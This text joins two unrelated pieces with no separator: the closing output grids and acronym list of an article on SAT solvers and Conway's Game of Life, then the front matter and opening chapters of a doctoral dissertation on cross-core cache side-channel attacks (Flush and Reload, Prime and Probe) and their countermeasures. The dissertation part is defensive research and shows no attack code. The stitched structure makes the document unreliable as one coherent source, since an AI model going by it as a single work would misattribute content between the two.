***.*.*..*.*..*.*.**
*....*....*....*....
1.rle written
61119 clauses
..**.**......*.*.*..
...*.*.....***.**.*.
...*..*...*.......*.
....*.*..*.*......**
...**.*.*..*...**.*.
..*...*.***.....*.*.
...*.*.*......*..*..
****.*..*....*.**...
*....**.*....*.*....
...**..*...**..*....
..*..*....*....*.**.
.*.*.**....****.*..*
..*.*....*.*..*..**.
....*.****..*..*.*..
....**....*.*.**..*.
*.**...****.*..*.**.
**...**.....**.*....
...**..*.***..*.**.*
***.*..*.*..*.*.*.**
*.......*..**.**....
2.rle written
...

Let's try denser still: one mandatory true cell per each 4-cell chunk:

61133 clauses
.**.**...*....**..**
*.*.*...*.*..*..*..*
*....*...*.*..*.**..
.***.*.....*.**.*...
..*.*.....**...*..*.
*......**..*...*.**.
**.....*...*.**.*...
...**...*...**..*...
**.*..*.*......*...*
.*...**.**..***.****
.*....*.*..*..*.*...
**.***...*.**...*.**
.*.*..****.....*..*.
*....*.....**..**.*.
*.***.*..**.*.....**
.*...*..*......**...
...*.*.**......*.***
..**.*.....**......*
*..*.*.**..*.*..***.
**....*.*...*...*...
1.rle written
61139 clauses
.**.**...*....**..**
*.*.*...*.*..*..*..*
*....*...*.*..*.**..
.***.*.....*.**.*...
..*.*.....**...*..*.
*......**..*...*.**.
**.....*...*.**.*...
...**...*...**..*...
**.*..*.*......*...*
.*...**.**..***.****
.*....*.*..*..*.*...
**.***...*.**...*.**
.*.*..****.....*..*.
*....*.....**..**.*.
*.***.*..**.*.....**
.*...*..*......**..*
...*.*.**......*.**.
..**.*.....**....*..
*..*.*.**..*.*...*.*
**....*.*...*.....**
2.rle written
...

...and even more: one cell per each 3-cell chunk:

61166 clauses
**.*..**...**.**....
*.**..*.*...*.*.*.**
....**..*...*...*.*.
.**..*.*.**.*.*.*.*.
..**.*.*...*.**.*.**
*...*.*.**.*....*.*.
**.*..*...*.*.***..*
.*.*.*.***..**...**.
.*.*.*.*..**...*.*..
**.**.*..*...**.*..*
..*...*.**.**.*.*.**
..*.**.*..*.*.*.*...
**.*.*...*..*.*.*...
.*.*...*.**..*..***.
.*..****.*....**...*
..*.*...*..*...*..*.
.**...*.*.**...*.*..
..*..**.*.*...**.**.
..*.*..*..*..*..*..*
.**.**....**..**..**
1.rle written
61172 clauses
**.*..**...**.**....
*.**..*.*...*.*.*.**
....**..*...*...*.*.
.**..*.*.**.*.*.*.*.
..**.*.*...*.**.*.**
*...*.*.**.*....*.*.
**.*..*...*.*.***..*
.*.*.*.***..**...**.
.*.*.*.*..**...*.*..
**.**.*..*...**.*..*
..*...*.**.**.*.*.**
..*.**.*..*.*.*.*...
**.*.*...*..*.*.*...
.*.*...*.**..*..***.
.*..****.*....**...*
..*.*...*..*...*..*.
.**..**.*.**...*.*..
*..*.*..*.*...**.**.
*..*.*.*..*..*..*..*
.**...*...**..**..**
2.rle written
...

This is the densest variant. Unfortunately, it's impossible to construct a "still life" with one mandatory true cell per each 2-cell chunk.

11.4.3 The source code

Source code and a Wolfram Mathematica notebook: https://github.com/dennis714/SAT_SMT_article/tree/master/SAT/GoL .

12 Acronyms used

CNF: Conjunctive normal form
DNF: Disjunctive normal form
DSL: Domain-specific language
CPRNG: Cryptographically Secure Pseudorandom Number Generator
SMT: Satisfiability modulo theories
SAT: Boolean satisfiability problem
LCG: Linear congruential generator
PL: Programming Language
OOP: Object-oriented programming
SSA: Static single assignment form
CPU: Central processing unit
FPU: Floating-point unit
PRNG: Pseudorandom number generator
CRT: C runtime library
CRC: Cyclic redundancy check
AST: Abstract syntax tree
AKA: Also Known As
CTF: Capture the Flag
ISA: Instruction Set Architecture
CSP: Constraint satisfaction problem
CS: Computer science
DAG: Directed acyclic graph
NOP: No Operation
JVM: Java Virtual Machine
VM: Virtual Machine
LZSS: Lempel–Ziv–Storer–Szymanski
RAM: Random-access memory
FPGA: Field-programmable gate array
EDA: Electronic design automation
MAC: Message authentication code
ECC: Elliptic curve cryptography
API: Application programming interface
NSA: National Security Agency
Cross-core Microarchitectural Side Channel Attacks and Countermeasures

by

Gorka Irazoqui

A Dissertation Submitted to the Faculty of the WORCESTER POLYTECHNIC INSTITUTE in partial fulfillment of the requirements for the Degree of Doctor of Philosophy in Electrical and Computer Engineering

April 2017

APPROVED:
Professor Thomas Eisenbarth, Dissertation Advisor, ECE Department
Professor Berk Sunar, Dissertation Committee, ECE Department
Professor Craig Shue, Dissertation Committee, CS Department
Professor Engin Kirda, Dissertation Committee, Northeastern University

Abstract

In the last decade, multi-threaded systems and resource sharing have brought a number of technologies that facilitate our daily tasks in a way we never imagined. Among others, cloud computing has emerged to offer us powerful computational resources without having to physically acquire and install them, while smartphones have almost acquired the same importance desktop computers had a decade ago. This has only been possible thanks to the ever-evolving performance optimization improvements made to modern microarchitectures that efficiently manage concurrent usage of hardware resources. One of the aforementioned optimizations is the usage of shared Last Level Caches (LLCs) to balance different CPU core loads and to maintain coherency between shared memory blocks utilized by different cores. The latter, for instance, has enabled concurrent execution of several processes in low-RAM devices such as smartphones.

Although efficient hardware resource sharing has become the de-facto model for several modern technologies, it also poses a major concern with respect to security. Some of the concurrently executed co-resident processes might in fact be malicious and try to take advantage of hardware proximity. New technologies usually claim to be secure by implementing sandboxing techniques and executing processes in isolated software environments, called Virtual Machines (VMs).
However, the design of these isolated environments aims at preventing pure software-based attacks and usually does not consider hardware leakages. In fact, the malicious utilization of hardware resources as covert channels might have severe consequences for the privacy of the customers.

Our work demonstrates that malicious customers of such technologies can utilize the LLC as a covert channel to obtain sensitive information from a co-resident victim. We show that the LLC is an attractive resource to be targeted by attackers, as it offers high resolution and, unlike previous microarchitectural attacks, does not require core co-location. Particularly concerning are the cases in which cryptography is compromised, as it is the main component of every security solution. In this sense, the presented work not only introduces three attack variants that can be applicable in different scenarios, but also demonstrates the ability to recover cryptographic keys (e.g. AES and RSA) and TLS session messages across VMs, bypassing sandboxing techniques.

Finally, two countermeasures to prevent microarchitectural attacks in general, and LLC attacks in particular, from retrieving fine-grain information are presented. Unlike previously proposed countermeasures, ours do not add permanent overheads to the system but can be utilized as preemptive defenses. The first identifies leakages in cryptographic software that can potentially lead to key extraction, and thus can be utilized by cryptographic code designers to ensure the sanity of their libraries before deployment. The second detects microarchitectural attacks embedded into innocent-looking binaries, preventing them from being posted in official application repositories that usually have the full trust of the customer.

Acknowledgements

The attacks described in Chapter 4 are based on collaborative work with Mehmet Sinan İnci and resulted in peer-reviewed publications [IIES14b, IIES15].
The content presented in Chapter 5 has been published as [IES16]. Parts of the results introduced in Chapter 6 are based on joint work with Mehmet Sinan İnci and Berk Gulmezoglu and resulted in publication [İGI+16a]. The rest of the content of Chapter 6 has been published in [IES15a, IES15b]. The vulnerability analysis described in Chapter 7 was performed jointly with Intel employees Xiaofei Guo, Hareesh Khattri, Arun Kanuparthi and Kai Cong, and is under submission at a peer-reviewed venue. The remaining contributions in the chapter have also been submitted to a peer-reviewed conference. This work was supported by the National Science Foundation (NSF), under grants CNS-1318919, CNS-1314770 and CNS-1618837.

This thesis is the result of several years of effort that would not have been successful without the collaboration, both professional and personal, of certain people to whom I would like to express my gratitude.

My two advisors, Thomas Eisenbarth and Berk Sunar, have given me the confidence and freedom to achieve the results presented in this thesis. Without their knowledge, advice and personal treatment this journey would have been much more complicated. They were able to take the best out of my skills, and sometimes even believed in me more than I did. I will always feel that part of the achievements I accomplish during my career will belong to them.

As part of this thesis I had the chance of working closely with Yuval Yarom and Xiaofei Guo. Besides the pleasure of working with them, I established with both of them a relationship that goes beyond our professional collaborations. I wish them the best of luck in both their professional careers and their personal lives.

I would like to thank the members of the Vernam lab for being such a great support in the most difficult moments. Every single person in the lab was helpful at some specific point during the last 4 years.
I am looking forward to maintaining the good relationships we built in the upcoming years.

I also would like to express my gratitude to the One United and E soccer team members, who gave me the distraction that every person needs to accomplish professional success. Besides the three tournaments we won together, they provided me invaluable personal support which produced friendships that I will never forget. They can feel proud of being one of the most positive things I take from this experience.

My parents and my sister have always been the first ones to believe in me, and have a great influence on any success I achieve in my career. Although they already know what they mean to me, I would still like to thank them for everything they do to always bring out the best in me. I cannot imagine a better source of strength for the upcoming challenges.

Finally, I would like to thank Elena Gonzalez for being the best person I could ever find to stay by my side. Despite all the obstacles she never gave up on us. I will always be indebted to her for all the support she gave me to complete this thesis. She has shown me personal values that I rarely find in other people, and that I am willing to enjoy every day from now on.

Contents

1 Introduction . . . 1
2 Background . . . 6
2.1 Side Channel Attacks . . . 6
2.2 Computer Microarchitecture . . . 7
2.2.1 Hardware Caches . . . 8
2.3 The Cache as a Covert Channel . . . 11
2.3.1 The Evict and Time Attack . . . 11
2.3.2 The Prime and Probe Attack . . . 13
2.4 Functionality of Commonly Used Cryptographic Algorithms . . . 13
2.4.1 AES . . . 13
2.4.2 RSA . . . 16
2.4.3 Elliptic Curve Cryptography . . . 19
3 Related Work . . . 21
3.1 Classical Side Channel Attacks . . . 21
3.1.1 Timing Attacks . . . 21
3.1.2 Power Attacks . . . 22
3.2 Microarchitectural Attacks . . . 23
3.2.1 Hyper-threading . . . 24
3.2.2 Branch Prediction Unit Attacks . . . 24
3.2.3 Out-of-order Execution Attacks . . . 25
3.2.4 Performance Monitoring Units . . . 26
3.2.5 Special Instructions . . . 26
3.2.6 Hardware Caches . . . 27
3.2.7 Cache Internals . . . 28
3.2.8 Cache Pre-Fetching . . . 29
3.2.9 Other Attacks on Caches . . . 29
3.2.10 Memory Bus Locking Attacks . . . 30
3.2.11 DRAM and Rowhammer Attacks . . . 30
3.2.12 TEE Attacks . . . 31
3.2.13 Cross-core/-CPU Attacks . . . 32
4 The Flush and Reload Attack . . . 34
4.1 Flush and Reload Requirements . . . 35
4.2 Memory Deduplication . . . 36
4.3 Flush and Reload Functionality . . . 37
4.4 Flush and Reload Attacking AES . . . 39
4.4.1 Description of the Attack . . . 40
4.4.2 Recovering the Full Key . . . 42
4.4.3 Attack Scenario 1: Spy Process . . . 44
4.4.4 Attack Scenario 2: Cross-VM Attack . . . 45
4.4.5 Experiment Setup and Results . . . 45
4.4.6 Comparison to Other Attacks . . . 47
4.5 Flush and Reload Attacking Transport Layer Security: Reviving the Lucky 13 Attack . . . 49
4.5.1 The TLS Record Protocol . . . 49
4.5.2 HMAC . . . 50
4.5.3 CBC Encryption & Padding . . . 51
4.5.4 An Attack On CBC Encryption . . . 51
4.5.5 Analysis of Lucky 13 Patches . . . 52
4.5.6 Patches Immune to Flush and Reload . . . 53
4.5.7 Patches Vulnerable to Flush and Reload . . . 53
4.5.8 Reviving Lucky 13 on the Cloud . . . 55
4.5.9 Experiment Setup and Results . . . 59
4.6 Flush and Reload Outcomes . . . 62
5 The First Cross-CPU Attack: Invalidate and Transfer . . . 64
5.1 Cache Coherence Protocols . . . 65
5.1.1 AMD HyperTransport Technology . . . 67
5.1.2 Intel QuickPath Interconnect Technology . . . 68
5.2 Invalidate and Transfer Attack Procedure . . . 69
5.3 Exploiting the New Covert Channel . . . 71
5.3.1 Attacking Table Based AES . . . 72
5.3.2 Attacking Square and Multiply El Gamal Decryption . . . 72
5.4 Experiment Setup and Results . . . 73
5.4.1 Experiment Setup . . . 74
5.4.2 AES Results . . . 74
5.4.3 El Gamal Results . . . 76
5.5 Invalidate and Transfer Outcomes . . . 79
6 The Prime and Probe Attack . . . 80
6.1 Virtual Address Translation and Cache Addressing . . . 80
6.2 Last Level Cache Slices . . . 82
6.3 The Original Prime and Probe Technique . . . 83
6.4 Limitations of the Original Prime and Probe Technique . . . 84
6.5 Targeting Small Pieces of the LLC . . . 85
6.6 LLC Set Location Information Enabled by Huge Pages . . . 85
6.7 Reverse Engineering the Slice Selection Algorithm . . . 87
6.7.1 Probing the Last Level Cache . . . 88
6.7.2 Identifying m Data Blocks Co-Residing in a Slice . . . 88
6.7.3 Generating Equations Mapping the Slices . . . 89
6.7.4 Recovering Linear Hash Functions . . . 91
6.7.5 Experiment Setup for Linear Hash Functions . . . 92
6.7.6 Results for Linear Hash Functions . . . 93
6.7.7 Obtaining Non-linear Slice Selection Algorithms . . . 95
6.8 The LLC Prime and Probe Attack Procedure . . . 98
6.8.1 Prime and Probe Applied to AES . . . 99
6.8.2 Experiment Setup and Results for the AES Attack . . . 101
6.9 Recovering RSA Keys in Amazon EC2 . . . 105
6.10 Prime and Probe Outcomes . . . 114
7 Countermeasures . . . 116
7.1 Existing Countermeasures . . . 117
7.1.1 Page Coloring . . . 117
7.1.2 Performance Event Monitoring to Detect Cache Attacks . . . 118
7.2 Problems with Previously Existing Countermeasures . . . 119
7.3 Detecting Cache Leakages at the Source Code . . . 120
7.3.1 Preliminaries . . . 122
7.3.2 Methodology . . . 124
7.3.3 Evaluated Crypto Primitives . . . 130
7.3.4 Cryptographic Libraries Evaluated . . . 135
7.3.5 Results for AES . . . 135
7.3.6 Results for RSA . . . 137
7.3.7 Results for ECC . . . 140
7.3.8 Leakage Summary . . . 143
7.3.9 Comparison with Related Work . . . 143
7.3.10 Recommendations to Avoid Leakages in Cryptographic Software . . . 145
7.3.11 Outcomes . . . 147
7.4 MASCAT: Preventing Microarchitectural Attacks from Being Executed . . . 147
7.4.1 Microarchitectural Attacks . . . 149
7.4.2 Implicit Characteristics of Microarchitectural Attacks . . . 152
7.4.3 Our Approach: MASCAT, a Static Analysis Tool for Microarchitectural Attacks . . . 154
7.4.4 Experiment Setup . . . 160
7.5 Results . . . 161
7.5.1 Analysis of Microarchitectural Attacks . . . 161
7.5.2 Results for Benign Binaries . . . 161
7.5.3 Limitations . . . 164
7.5.4 Outcomes . . . 165
8 Conclusion . . . 166

List of Figures

1.1 Hardware attacks bypass VM isolation . . . 3
2.1 Side channel attack scenario . . . 7
2.2 Typical microarchitecture layout in modern processors . . . 8
2.3 Cache access time distribution . . . 9
2.4 Evict and Time procedure . . . 12
2.5 Prime and Probe procedure . . . 14
2.6 AES 128 state diagram with respect to its 4 main operations . . . 15
2.7 Last round of a T-table implementation of AES . . . 16
2.8 ECC elliptic curve in which R=P+Q . . . 19
2.9 ECDH procedure . . . 20
4.1 Memory Deduplication Feature . . . 37
4.2 Copy-on-Write Scheme . . . 38
4.3 Flush and Reload access time distinction . . . 39
4.4 Flush and Reload results for AES . . . 47
4.5 CBC mode TLS functionality . . . 50
4.6 Network time difference with Lucky 13 patches . . . 56
4.7 Cache access times for Lucky 13 vulnerabilities . . . 57
4.8 Flush and Reload 2 byte results for PolarSSL Lucky 13 vulnerability . . . 60
4.9 Flush and Reload 1 byte results for PolarSSL Lucky 13 vulnerability . . . 61
4.10 Flush and Reload 1 byte results for CyaSSL Lucky 13 vulnerability . . . 62
4.11 Flush and Reload 1 byte results for GnuTLS Lucky 13 vulnerability . . . 63
5.1 DRAM accesses vs directed probes thanks to the HyperTransport links . . . 68
5.2 HT link vs DRAM access . . . 69
5.3 HT and DRAM time access difference in AMD . . . 70
5.4 QPI and DRAM time access difference in Intel . . . 71
5.5 Miss counter values for each ciphertext value, normalized to the average . . . 75
5.6 Invalidate and Transfer key finding step . . . 76
5.7 Encryptions to recover the AES key with Invalidate and Transfer . . . 76
5.8 RSA decryption trace observed with Invalidate and Transfer . . . 77
5.9 Key recovery step for an Invalidate and Transfer RSA trace . . . 78
6.1 A hash function based on the physical address decides whether the memory block belongs to slice 0 or 1 . . . 83
6.2 Last level cache slice addressing methodology for Intel processors . . . 84
6.3 4KB vs 2MB offset information comparison . . . 86
6.4 Slice colliding memory block generation: Step 1 . . . 89
6.5 Slice colliding memory block generation: Step 2 . . . 90
6.6 Slice colliding memory block generation: Step 3 . . . 91
6.7 Slice access distribution in Intel Xeon E5-2670 v2 . . . 96
6.8 Prime and Probe probing cache vs memory time histogram . . . 98
6.9 T-table set identification step with Prime and Probe . . . 102
6.10 Table cache line access distribution per ciphertext byte . . . 103
6.11 Results for AES key recovery with Prime and Probe . . . 104
6.12 RSA trace identification step with Prime and Probe . . . 109
6.13 RSA multiplicand recovery and alignment with Prime and Probe . . . 110
6.14 Comparison of the final obtained peaks with the correct peaks with adjusted timeslot resolution . . . 111
7.1 Page coloring implementation . . . 118
7.2 HPC as a cache attack monitoring unit . . . 119
7.3 Vulnerable code snippet example . . . 124
7.4 Code snippet wrapped in cache tracer . . . 125
7.5 Results for cache traces obtained from toy example . . . 125
7.6 Taint analysis example . . . 128
7.7 Noise threshold adjustment . . . 130
7.8 First and Last round of an AES encryption . . .
131 7.9 WolfSSL and NSS AES leakage . . . . . . . . . . . . . . . . . . . . . 136 7.10 OpenSSL and Libgcrypt AES leakage . . . . . . . . . . . . . . . . . . 136 7.11 Montgomery ladder RSA leakage for WolfSSL . . . . . . . . . . . . . 137 7.12 Sliding window RSA leakage for a) WolfSSL and b) MbedTLS . . . . 137 7.13 Leakage for fixed window RSA in a) OpenSSL and b) IPP . . . . . . 138 7.14 Varying leakage due to cache missalignment explanation . . . . . . . 139 7.15 Montgomery Ladder ECC leakage for a) WolfSSL and b) Libgcrypt . 141 7.16 Sliding window ECC leakage in WolfSSL . . . . . . . . . . . . . . . . 142 7.17 ECC leakage in MbedTLS and Bouncy Castle . . . . . . . . . . . . . 142 7.18 wNAF ECC OpenSSL results . . . . . . . . . . . . . . . . . . . . . . 143 7.19 Flush and Reload code snippet from [YF14] . . . . . . . . . . . . . . 150 7.20 Rowhammer code snippet from [KDK+14a] . . . . . . . . . . . . . . . 151 7.21 Attribute analysis and threat score update implemented by MASCAT . 157 x 7.22 Visual example output of MASCAT , in which a flush and reload attack is detected . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 160 xi List of Tables 3.1 Side channel attack classification according to utilized data analysis method . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 4.1 Comparison of cache side channel attack techniques against AES . . . 48 5.1 Summary of error results in the RSA key recovery attack . . . . . . . 78 6.1 Comparison of the profiled architectures . . . . . . . . . . . . . . . . 93 6.2 Slice selection hash function for the profiled architectures . . . . . . . 94 6.3 Hash selection algorithm implemented by the Intel Xeon E5-2670 v2 . 97 6.4 Successfully recovered peaks on average in an exponentiation . . . . . 111 7.1 Cryptographic libraries evaluated . . . . . . . . . . . . . . . . . . . . 135 7.2 Leakage summary for the cryptographic libraries. Default implemen- tations are presented in bold . . . . . . . . . 
. . . . . . . . . . . . . . 144 7.3 Antivirus analysis output for microarchitectural attacks . . . . . . . . 155 7.4 Percentage of attacks correctly flagged by MASCAT (true positives). . 161 7.5 Results for different groups of binaries from Ubuntu Software Center. 162 7.6 Results for different groups of APKs. . . . . . . . . . . . . . . . . . . 163 xii 7.7 Explanation for benign binaries classified as threats. . . . . . . . . . . 163 xiii Chapter 1 Introduction The rapid increase in transistor densities over the past few decades brought numer- ous computing applications, previously thought impossible, into the realm of every- day computing. With dense integration and increased clock rates, heat dissipation in single core architectures has become a major challenge for processor manufactur- ers. The design of multi-core architectures has been the method of choice to profit from further advances in integration, a solution that has shown to substantially improve the performance over single-core architectures. Lately, the design of multi- CPU sockets (each allocating multi-core systems) has taken even more advantage of the benefits of having several Central Processing Units executing different tasks in parallel. Despite its many advantages, multi-core and multi-CPU architectures are sus- ceptible to suffering under bandwidth bottlenecks if the architecture is not designed properly, especially when more cores are packed into a high-performance system. Parallelism can only be effective if shared resources are correctly managed, ensuring their fair distribution. Several components have been designed and added to mod- ern microarchitecture designs to achieve this goal. A good example are inclusive Last Level Caches (LLCs), which are shared across multiple CPU cores and aid the maintenance of cache coherency protocols within the same CPU socket by ensuring that copies in the upper level caches exist in the LLC. 
In fact, it is the aforementioned parallelism that has enabled many of the technologies we use on a daily basis. For instance, in the last decade we have witnessed the cloud revolution, which co-locates several customers (and their corresponding workloads) on a single physical machine. The concurrent execution of so many processes on the same computer would not be possible without the multi-core/multi-CPU designs that are common nowadays. Similarly, smartphones are now able to execute several processes at the same time by running some of them in the background. This has been possible thanks to the widespread adoption of multi-core architectures by embedded devices; modern smartphones not only have several cores in the same device, but have also started to incorporate more than one CPU socket.

Although parallelism and resource sharing help to improve performance, they also pose a big risk when untrusted processes execute alongside trusted processes. For example, a malicious attacker can take advantage of being co-resident with a potential victim and execute malicious code in commercial clouds. Similarly, a malicious application can try to steal sensitive information from a benign security-critical application, e.g., an online banking application. To cope with these issues, both trusted and untrusted processes are usually executed in a software-isolated environment. IaaS clouds, for instance, rent expensive hardware resources to multiple customers by offering guest OS instances sandboxed inside virtual machines (VMs). PaaS cloud services go one step further and allow users to share the application space while sandboxed at the OS level, e.g., using containers. Similar sandboxing techniques are used to isolate semi-trusted apps running on mobile devices. Even browsers use sandboxing to execute untrusted code without the risk of harming the local host.
All these mechanisms have a clear goal in mind: taking advantage of resource sharing among several applications/users while isolating each of them to prevent malicious exploitation of the said shared resources.

Despite the widespread adoption of the aforementioned technologies, the robustness of the resource-sharing scenarios that they provide had, prior to this work, not yet been tested against malicious users exploiting hardware covert channels. While the resistance of these technologies to pure software attacks is usually guaranteed, their response to hardware-leakage-based attacks remains an open question. In the following we will refer to these attacks, which utilize hardware resources like the cache and the Branch Prediction Unit (BPU) to gain information, as microarchitectural attacks.

By 2014, only [RTSS09, ZJRR12] had succeeded in recovering information from co-resident users in realistic cloud environments utilizing microarchitectural attacks: the first recovers keystrokes across VMs in Amazon EC2, the latter recovers an El Gamal decryption key in a lab virtualization environment. The problem mostly comes from the fact that these and the rest of the works prior to this thesis (except for [YF14]) only consider core-private covert channels like the L1 cache and the BPU. Therefore these attacks are only applicable when victim and attacker are core co-resident. With multi-core systems being the de facto architecture utilized not only in high-end servers but also in smartphone devices, the core co-residency requirement significantly reduces the applicability of previously known microarchitectural attacks. Further, constant optimization and penalty reduction make core-private resources difficult to utilize given the amount of noise that regular workloads introduce. For instance, L1 cache misses and L2 cache hits only differ by a few cycles, while mispredicted branches do not add substantial overhead. It is questionable whether these covert channels would support the typical amount of noise in sandboxed scenarios.

It is therefore necessary to investigate whether more powerful and applicable covert channels can be utilized for unauthorized information extraction. For instance, considering covert channels that do not require core co-location increases the attack probability, as only CPU socket co-residency is needed. This becomes a crucial fact in, e.g., commercial clouds, where core co-residence is highly unlikely.

[Figure 1.1: Malicious VMs can try to bypass the isolation provided by the hypervisors and steal information from co-resident VMs]

In fact, several microarchitectural components are connected not only across cores but also across CPU sockets. These include, among others, the Last Level Cache (LLC), the memory bus and the DRAM. All these possible covert channels have to be thoroughly investigated to understand their capabilities and to develop the appropriate countermeasures to prevent their utilization for information theft.

Contributions

This thesis focuses on one of the aforementioned potentially powerful covert channels, i.e., the LLC. We will show its exploitability under different assumptions and scenarios. We present three attacks that can take advantage of such a resource, namely Flush and Reload, Invalidate and Transfer and Prime and Probe. The first is only applicable across cores and under memory deduplication features, the second is capable of reaching victims across CPU sockets under the same memory deduplication assumption, and the latter is able to recover information across cores without any special requirement.

We show how and where these three attacks can be applied, specifically in scenarios where previous attacks had proven to behave poorly. For instance, we show for the first time how to recover information across VMs located in different cores with the Flush and Reload attack in VMware.
Further, we show that these attacks can be taken to multi-CPU-socket machines by applying the Invalidate and Transfer attack on a 4-CPU-socket school server. In addition, this thesis presents the LLC Prime and Probe attack, applicable in any hypervisor without any special requirement (even VMware with updated security features). In fact, we utilize it to recover an RSA key from a co-resident VM in Amazon EC2, demonstrating the big threat that cache attacks pose in real-world scenarios.

Lastly, we develop two tools that can help prevent these leakages from being exploited. However, unlike other proposed countermeasures, which add permanent performance overheads that private companies are unwilling to afford, our solutions take a preemptive approach. The first aims at identifying LLC leakages in cryptographic code to ensure they are caught before the software reaches end users. In particular, we use taint analysis, cache trace analysis and Mutual Information (MI) to derive whether a cryptographic code leaks or not. We found alarming results, as 50% of the implementations leaked information for the AES, RSA and ECC algorithms. The second tool, MASCAT, takes a different approach. With official application stores like Google Play or the Microsoft Store rising in popularity, it is important that the binaries offered by these repositories are malware-free. Unlike regular malware, e.g. shell code, which might be easily detectable by modern antivirus tools, microarchitectural attacks are different, as they do not look malicious. MASCAT serves as a microarchitectural attack antivirus, detecting such attacks inside binaries without having to inspect the source code manually.

Our work resulted in the discovery of several vulnerabilities in existing products that attackers could take advantage of to steal information belonging to co-resident victims.
As part of our responsibility as researchers, we notified the corresponding software designers about the vulnerabilities of their solutions. These conversations led to several security updates: VMware decided to implement a new salt-based deduplication mechanism (CVE-2014-3566), Intel modified the RSA implementation of its cryptographic library (CVE-2016-8100), the Bouncy Castle cryptographic library re-designed its AES implementation (2016-10003323) and WolfSSL closed leakages in all of its AES, RSA and ECC implementations (CVEs 2016-7438, 2016-7439 and 2016-7440). Thus, our investigation played a key role in improving and updating several current security solutions that, otherwise, could have compromised the privacy of their customers.

In summary, this work:

• Demonstrates the applicability of the Flush and Reload attack in virtualized environments by recovering AES keys across cores in less than a minute.

• Shows that cache attacks can go beyond cryptographic algorithms by attacking three TLS implementations and re-implementing the supposedly closed Lucky 13 attack.

• Presents Invalidate and Transfer, a new attack targeting the cache coherency protocol that works across CPU sockets. We demonstrate its viability by recovering AES and RSA keys.

• Introduces the LLC Prime and Probe attack, which does not require memory deduplication to succeed. In order to successfully apply the Prime and Probe attack, a thorough investigation of the architecture of LLCs is performed, in particular of how cache slices are distributed. We also show how the Prime and Probe attack succeeds in hypervisors where Flush and Reload was not able to succeed, e.g., the Xen hypervisor.

• Shows, for the first time, the applicability of microarchitectural attacks in commercial clouds. More precisely, we demonstrate how to recover an RSA key across co-resident VMs in Amazon EC2.

• Presents a cache leakage analysis tool to prevent the design of cryptographic algorithms from leaking information.
We found alarming results, as 50% of the implementations showed cache leakages that could lead to full key extraction.

• Introduces MASCAT, a tool to detect microarchitectural attacks embedded in apparently innocent-looking binaries. MASCAT serves as a verification process for official application distributors that want to ensure the sanity of the binaries being offered in their repositories.

• Proposes fixes (which have been adopted) to all the vulnerabilities discovered in commercial software as a result of the previously mentioned contributions.

The rest of the thesis is organized as follows. Chapter 2 describes the necessary background to understand the attacks and defenses later developed. Related work, both prior and concurrent to this thesis, is presented in Chapter 3. Chapters 4, 5 and 6 describe the deployment of Flush and Reload, Invalidate and Transfer and Prime and Probe, respectively. Finally, Chapter 7 describes the aforementioned countermeasures.

Chapter 2

Background

This thesis includes a detailed description of how cache attacks can be applied across cores to recover sensitive information belonging to a co-resident victim. To help the reader understand the attacks that will later be presented, this chapter gives an introduction to the typical microarchitecture layout found in modern processors and the attacks that were proposed prior to this thesis. Further, we give a description of the most widely used cryptographic algorithms, as they will be under the attack radar of our microarchitectural attacks in subsequent chapters.

2.1 Side Channel Attacks

Side Channel Attacks (SCA) are attacks that take advantage of the leakage coming from a side channel during a secure communication. Typical attacks on the direct channel involve brute-forcing the key or social phishing. Instead, side channel attacks observe additional information stemming from side channels that carry information about the key.
These side channel traces are then processed and correlated to either obtain the full key or to reduce its search space significantly. Figure 2.1 shows the overall idea, where two parties are trying to establish an encrypted communication over an insecure channel. Due to the leakage stemming from unintended side channels, an attacker can at least try to use that information to obtain the key.

This leakage can come in many forms. Power and Electromagnetic (EM) leakages are common in embedded devices and smartcards and usually imply having physical access to the device. Timing attacks can deduce information about a secret by distinguishing the overall processing time, but they suffer from the huge amount of noise in modern communication channels (e.g., the internet). Microarchitectural attacks, in general, try to obtain information from the usage of some microarchitectural resource. Although they require physical co-residence with the targeted process, they do not need physical access to the device. In fact, several scenarios can arise in which malicious code is executed alongside a potential victim on the same physical machine. Other leakage forms are less common, e.g. sound or thermal, but are constantly being studied to increase the applicability of side channel attacks [KJJ99, BECN+04, KJJR11].

[Figure 2.1: Side channel attack scenario. Instead of the direct channel, leakage coming from side channels is exploited to obtain information about the key. Figure from [Mic].]

2.2 Computer Microarchitecture

Modern computers execute user-specified instructions and data in a Central Processing Unit (CPU), store the memory necessary to execute software in DRAM, and interact with the outside world through peripherals. With a constantly evolving market and strong competitors fighting for the same marketplace, efficiency has become one of the main goals of every microarchitecture designer.
In fact, several hardware resources have been added to the basic microarchitectural components, e.g., caches or Branch Prediction Units (BPUs), to provide better performance. Further, modern microarchitectures now embed several processing units in the same processor, some of which are even capable of processing two threads concurrently. Even further, lately we have observed the rise of multi-CPU-socket computers, in which more than one CPU socket is embedded in the same piece of hardware. All these technological advances have the same goal: offering the end user the best computing performance.

A typical microarchitecture design commonly found in modern processors can be observed in Figure 2.2. The example shows a dual-socket system, each CPU having two cores. Each CPU core has private L1 and L2 caches, while all cores in a socket share the Last Level Cache (LLC). Further, each core has its own BPU, in charge of predicting the outcome of the branches being executed. The communication between the cache hierarchy and the memory is done through the memory bus, which is also in charge of maintaining coherency between shared blocks across CPU sockets. Finally, the DRAM stores the instructions and data that the program being executed needs.

[Figure 2.2: Typical microarchitecture layout in modern processors: two CPU sockets, each with two cores; per-core L1 instruction/data caches, L2 cache and BPU (predictor and BTB); a shared L3 cache per socket; memory bus and DRAM.]

Although each component would merit an exhaustive and thorough analysis, we put our focus on caches, as they are the core component being examined in this thesis.
Nevertheless, some of the functionalities of the aforementioned components will be described in greater detail later in the thesis when needed.

2.2.1 Hardware Caches

Hardware caches are small memories placed between the DRAM and the CPU cores to store data and instructions that are likely to be reused soon. When the software needs a particular memory block, the CPU first checks the cache hierarchy looking for that memory block. If found, the memory block is fetched from the cache and the access time is significantly faster. If the memory block is not found in the cache hierarchy, it is fetched from the DRAM at the cost of a slower access time. These two scenarios are called a cache hit and a cache miss, respectively.

At this point the main question is probably how much faster cache accesses are than DRAM accesses. This can be observed in Figure 2.3, for which we performed consecutive timed accesses to an L1-cached, an L3-cached and an uncached memory block on an Intel i5-3320M. The access time for the L1 cache is about 3 cycles and for the L3 cache around 7 cycles, while an access to memory takes around 25 cycles. Thus, an access to the DRAM is about 3 times slower than an access to the lowest cache level, which gives an idea of the performance improvement that the cache hierarchy offers to software execution.

[Figure 2.3: Reload timing distribution when a memory block is loaded from the L1 cache, the L3 cache and memory. The experiments were performed on an Intel i5-3320M.]
